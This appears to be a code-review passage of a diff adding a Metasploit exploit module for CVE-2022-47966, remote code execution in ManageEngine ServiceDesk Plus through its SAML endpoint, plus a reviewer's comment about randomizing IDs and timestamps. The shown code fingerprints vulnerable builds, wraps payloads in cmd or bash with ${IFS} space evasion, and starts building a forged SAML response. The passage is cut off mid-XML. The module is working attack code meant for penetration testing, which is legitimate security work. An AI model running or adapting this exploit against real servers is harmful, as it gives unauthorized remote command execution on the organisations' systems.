modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb

```diff
@@ -0,0 +1,216 @@
+            }
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 8080
+        },
+        'DefaultTarget' => 1,
+        'DisclosureDate' => '2023-01-10',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE,],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Privileged' => true
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The SAML endpoint URL', '/SamlResponseServlet' ]),
+      OptInt.new('DELAY', [ true, 'Number of seconds to wait between each request', 5 ])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'])
+    )
+    return CheckCode::Unknown unless res
+
+    # vulnerable servers respond with 400 and a HTML body
+    return CheckCode::Safe unless res.code == 400
+
+    script = res.get_html_document.xpath('//script[contains(text(), "BUILD_NUMBER")]')
+    info = script.text.match(/PRODUCT_NAME\\x22\\x3A\\x22(?<product>.+?)\\x22,.*BUILD_NUMBER\\x22\\x3A\\x22(?<build>[0-9]+?)\\x22,/)
+    return CheckCode::Unknown unless info
+    unless info[:product] == 'ManageEngine\\x20ServiceDesk\\x20Plus'
+      return CheckCode::Safe("This is not ManageEngine ServiceDesk Plus (#{info[:product]})")
+    end
+    unless Rex::Version.new(info[:build]) <= Rex::Version.new('14003')
+      return CheckCode::Safe("Target build is #{info[:build]}")
+    end
+
+    CheckCode::Appears
+  end
+
+  def encode_begin(real_payload, reqs)
+    super
+
+    reqs['EncapsulationRoutine'] = proc do |_reqs, raw|
+      raw.start_with?('powershell') ? raw.gsub('$', '`$') : raw
+    end
+  end
+
+  def exploit
+    case target['Type']
+    when :windows_command, :unix_cmd
+      execute_command(payload.encoded)
+    when :windows_dropper, :linux_dropper
+      execute_cmdstager(delay: datastore['DELAY'])
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    case target['Type']
+    when :windows_dropper
+      cmd = "cmd /c #{cmd}"
+    when :unix_cmd, :linux_dropper
+      cmd = cmd.gsub(' ') { '${IFS}' } if target['Type'] == :linux_dropper
+      cmd = "bash -c #{cmd}"
+    end
+    cmd = cmd.encode(xml: :attr).gsub('"', '')
+
+    saml = <<~EOS
+      <?xml version="1.0" encoding="UTF-8"?>
+      <samlp:Response
+        ID="_eddc1e5f-8c87-4e55-8309-c6d69d6c2adf"
+        InResponseTo="_4b05e414c4f37e41789b6ef1bdaaa9ff"
+        IssueInstant="2023-01-16T13:56:46.514Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
+        <samlp:Status>
+          <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
+        </samlp:Status>
+        <Assertion ID="_b5a2e9aa-8955-4ac6-94f5-334047882600"
+          IssueInstant="2023-01-16T13:56:46.498Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion">
+          <Issuer>#{Rex::Text.rand_text_alphanumeric(3..10)}</Issuer>
```

Comment:
Should check if the IDs can be randomized and if the timestamps can be set to something around now.